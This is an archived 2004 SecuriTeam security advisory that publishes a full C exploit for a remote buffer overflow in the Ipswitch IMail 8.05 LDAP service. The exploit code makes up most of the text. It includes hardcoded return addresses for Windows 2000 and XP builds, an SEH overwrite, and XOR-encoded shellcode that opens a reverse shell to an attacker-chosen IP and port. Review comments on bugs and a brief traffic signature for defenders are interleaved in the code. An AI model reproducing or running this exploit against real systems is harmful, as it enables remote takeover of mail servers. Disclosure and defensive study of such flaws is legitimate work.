[EXPL] Ipswitch IMail LDAP Remote Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 02/22/04

    To: list@securiteam.com
    Date: 22 Feb 2004 12:44:01 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Ipswitch IMail LDAP Remote Exploit
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article,
    <http://www.securiteam.com/windowsntfocus/5JP0B2AC0Y.html> Ipswitch IMail
    LDAP Daemon Remote Buffer Overflow, a vulnerability in Ipswitch's IMail
    allows remote attackers to overflow an internal buffer and make the
    daemon execute arbitrary code. The following exploit code can be used to
    test your system for the mentioned vulnerability. Note that the code is
    written for the specific 8.05 builds and Windows versions listed in its
    usage text, so a failed attempt does not by itself show that a system is
    unaffected.

    DETAILS

    Exploit:
    /******************************************************************/
    /* [Crpt] iMail v8.05 LDAP service remote sploit by kralor [Crpt] */
    /******************************************************************/
    /* *** iDefense */
    /* *** k-otik */
    /* *** private exploits */
    /* in other words, *** you all security money makers and */
    /* private exploits exchangers. */
    /* lolo xXx for her patience while these long nights coding */
    /* and for errr.. you know what :) */
    /******************************************************************/
    /* informations: www.coromputer.net,irc undernet #coromputer */
    /******************************************************************/

    #include < stdio.h>
    #include < stdlib.h>
    #include < string.h>
    #include < windows.h>
    #include < winsock.h>

    #pragma comment (lib,"ws2_32")

    // EBP+~0xB6 (ebp+ecx-4) (Structured Exception Handler)
    #define SEH_ADDR 0x50FFFFFF

    /* for win2k offset:
    --- jmp dword ptr [ebx]
    */
    #define HIJACKED_2K_EVL 0x0043BD8B // (8.05 eval)
    #define HIJACKED_2K_EXP 0x1000F7B0 // (8.05 express)
    #define HIJACKED_2K_PRO 0x1000F7A9 // (8.05 pro (not sure :)))

    /* for winXP offset:
    --- pop esi
    --- pop ebx
    --- ret
    */

    #define HIJACKED_XP_EVL 0x0041F5C7 // (8.05 eval)
    #define HIJACKED_XP_EXP 0x100106BC // (8.05 express)
    #define HIJACKED_XP_PRO 0x100103CC // (8.05 pro) (not sure :)))

    // sequence of 4 opcodes
    #define HOP 0xd4 // host opcode
    #define POP 0xd7 // port opcode

    /*
     * Opens a TCP connection to host:port and returns the connected socket.
     * Returns 0 on any failure after printing a message; the caller (main)
     * treats 0 as "no connection".
     *
     * NOTE(review): `yeah` is never zeroed, so sin_zero holds whatever was on
     * the stack; a `memset(&yeah,0,sizeof(yeah))` (or `= {0}`) before filling
     * it would be the usual form.
     */
    int cnx(char *host, int port)
    {
        int sock;
        struct sockaddr_in yeah;
        struct hostent *she;

        sock=socket(AF_INET,SOCK_STREAM,0);
        // BUG: Winsock socket() reports failure as INVALID_SOCKET (nonzero),
        // not 0, so this check never fires and a failed descriptor would be
        // handed to connect() below.
        if(!sock) {
          printf("error: unable to create socket\r\n");
          return 0;
          }
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host); // redundant: overwritten by the resolution below
        yeah.sin_port=htons((u_short)port);

    // Resolve by name first, then fall back to dotted-quad parsing.
    if((she=gethostbyname(host))!=NULL) {
        // h_length is copied unchecked into the 4-byte sin_addr; nothing here
        // verifies h_addrtype/h_length before the copy.
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
          printf("error: cannot resolve host\r\n");
          return 0; // socket leaked: no closesocket() on this path
          }
        }
        printf("[+] Connecting to %-30s ...",host);
        // Every connect() failure is reported as "connection refused", and the
        // socket is leaked on this path as well.
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
          printf("error: connection refused\r\n");
          return 0;
          }
        printf("Done\r\n");
        return sock;
    }

    /*
     * Prints the tool's banner to stdout. The first string literal is broken
     * across two lines in this archived copy (apparently line-wrapping in the
     * mail archive), which a C compiler rejects; it is shown as published.
     */
    void banner(void)
    {
        printf("\r\n [Crpt] iMail LDAP service v3.12.10.3/v8.05 remote sploit
    by kralor [Crpt]\r\n");
      printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
      return;
    }

    /*
     * Prints usage text and terminates the process.
     *
     * Because this calls exit(0), every `syntax(argv[0]); return -1;` pair in
     * main() never reaches its return, and a usage error yields exit status 0
     * rather than a failure code. The first literal is line-wrapped in this
     * archived copy, as in banner().
     */
    void syntax(char *prog)
    {
      printf("\r\nsyntax: %s < host> < your_ip> < your_port> < version>
    [OSver]\r\n\r\n",prog);
      printf("< version>\t0\t8.05 professional\r\n");
      printf(" \t1\t8.05 express\r\n");
      printf(" \t2\t8.05 evaluation\r\n---\r\n");
      printf("[OSver] \t0\twindows 2000 universal [default]\r\n");
      printf(" \t1\twindows XP universal\r\n");
      exit(0);
    }

    /*
     * Entry point. argv: <host> <your_ip> <your_port> <version> [OSver].
     * Builds one LDAP bind request in `buffer`, patches argv[2]/argv[3] into
     * the embedded payload, and sends the buffer once to TCP port 389 of
     * <host>. Exit status is 0 after send(), -1 on argument/socket errors
     * (but see syntax(), which itself exits with 0).
     *
     * Review notes on the code as published (no behavior changed here):
     *  - isdigit() is used but <ctype.h> is not among the includes.
     *  - atoi() gives no error indication; strtol() would report bad input.
     *  - send() transmits sizeof(buffer)-1 bytes, yet only bytes 0..7026 are
     *    ever written, so the tail of `buffer` is uninitialized stack memory
     *    that goes out on the wire.
     *  - WSACleanup() is never called to pair with WSAStartup().
     * For defenders: on the wire this is a single ~8 KB payload to port 389
     * that begins with the BER header in req1 and is filled mostly with 0x90.
     */
    int main(int argc, char *argv[])
    {
      int sock,bytes,target,osver=0;
      WSADATA wsaData;
      char buffer[8095]; // never fully initialized; see note above
      unsigned long host,port; // unsigned: the "port< =0" check below can only catch 0
      unsigned int i;
      char req1[] =
      "\x30\x82" /* bind request */
      "\x0a\x3d" /* bind req len */
      /* msg id */
      "\x02" /* integer */
      "\x01" /* length */
      "\x01" /* value */
      "\x60" /* bind request */
      "\x82" /* msg length 2bytes */
      "\x01\x36" /* msg length */
      /* LDAP ver */
      "\x02" /* integer */
      "\xff" /* length */
      "\x03" /* value */
      "\x05\x00" /* DN NULL */
      "\x80\x00"; /* Auth simple */

    char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */
      /* classic xorer */
      "\x90"
      "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
      "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
      /* reverse remote shell */
      "\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95"
      "\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8"
      "\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6"
      "\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c"
      "\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4"
      "\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95"
      "\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85"
      "\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3"
      "\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1"
      "\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1"
      "\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1"
      "\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4"
      "\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd"
      "\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e"
      "\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e"
      "\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6"
      "\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1"
      "\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96"
      "\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce"
      "\x57\x91\x95";

      banner();

    if(argc< 5||argc>6)
      syntax(argv[0]);

      // Both values are XORed with the same key the payload's decoder uses.
      host=inet_addr(argv[2])^0x95959595;
      port=atoi(argv[3]);

      // Argument checks: a single digit each. isdigit() needs <ctype.h>,
      // which this file does not include.
      if(!isdigit(argv[4][0])||strlen(argv[4])>1) {
      printf("error: < version> must be one digit\r\n");
      syntax(argv[0]);
      return -1; // unreachable: syntax() calls exit(0); same for the returns below
      }
      target=atoi(argv[4]);
      if(target< 0||target>2) {
      printf("error: < version> must be 0, 1 or 2\r\n");
      syntax(argv[0]);
      return -1;
      }
    if(argc==6) {
      if(!isdigit(argv[5][0])||strlen(argv[5])>1) {
      printf("error: [OSver] must be one digit\r\n");
      syntax(argv[0]);
      return -1;
      }
      osver=atoi(argv[5]);
      if(osver< 0||osver>1) {
      printf("error: [OSver] must be or 1\r\n"); // message omits the "0" option
      syntax(argv[0]);
      return -1;
      }
    }
      // port is unsigned long, so this only rejects 0; a negative atoi()
      // result wraps to a large value and is caught by the upper bound.
      if(port< =0||port>65535) {
      printf("error: < port> must be between 1 and 65535\r\n");
      syntax(argv[0]);
      return -1;
      }
      port=htons((unsigned short)port);
      port=port< < 16;
      port+=0x0002;
      port=port^0x95959595;

    // Scan for the 4-byte HOP and POP marker runs and overwrite them in place.
    // The loop reads shellc0de[i+1..i+3] without bounding i, so the last three
    // iterations read past the end of the array (out-of-bounds read).
    for(i=0;i< sizeof(shellc0de);i++) {
      if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
      if((unsigned char)shellc0de[i+2]==HOP&&(unsigned
    char)shellc0de[i+3]==HOP) {
        memcpy(&shellc0de[i],&host,4);
        host=0;
        }
      if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
      if((unsigned char)shellc0de[i+2]==POP&&(unsigned
    char)shellc0de[i+3]==POP) {
        memcpy(&shellc0de[i],&port,4);
        port=0;
        }
      }

    // host/port were zeroed once consumed; nonzero here means a marker was
    // not found.
    if(host||port) {
      printf("error: unabled to find ip/port sequence in shellc0de\r\n");
      return -1;
      }

    // 0x0101 requests Winsock 1.1. WSACleanup() is never called afterwards.
    if(WSAStartup(0x0101,&wsaData)!=0) {
      printf("error: unable to load winsock\r\n");
      return -1;
      }

      sock=cnx(argv[1],389);
    if(!sock)
      return -1;
    /* < ----- magic packet -----> */
      // strncpy stops at the first 0x00 byte; the first 13 bytes of req1
      // contain none, so 13 bytes are copied, but memcpy would state the
      // intent since this is binary data.
      strncpy(buffer,req1,13);
      memset(&buffer[13],0x90,7010);
      // The stores below type-pun an unaligned char buffer as unsigned long;
      // tolerated on x86 but not portable C.
      *(unsigned long*)&buffer[13] = SEH_ADDR;
      if(!osver) {
      if(!target)
      *(unsigned long*)&buffer[17] = HIJACKED_2K_PRO;
      else if(target==1)
      *(unsigned long*)&buffer[17] = HIJACKED_2K_EXP;
      else
      *(unsigned long*)&buffer[17] = HIJACKED_2K_EVL;
      } else {
      if(!target)
      *(unsigned long*)&buffer[17] = HIJACKED_XP_PRO;
      else if(target==1)
      *(unsigned long*)&buffer[17] = HIJACKED_XP_EXP;
      else
      *(unsigned long*)&buffer[17] = HIJACKED_XP_EVL;
      }
      *(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 <unwanted instructions> on winXP
      memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1);
      memcpy(&buffer[7000+23],&req1[10],4);
      printf("[+] Sending magic packet ...");
      // send() may return fewer bytes than requested or SOCKET_ERROR (-1);
      // the bytes==0 check below detects neither.
      bytes=send(sock,buffer,sizeof(buffer)-1,0);
      printf("Done\r\n");
      if(bytes==0) { printf("error: send()\r\n"); }
      closesocket(sock);
      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kralor@coromputer.net> Iván
    Rodriguez Almuiña.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


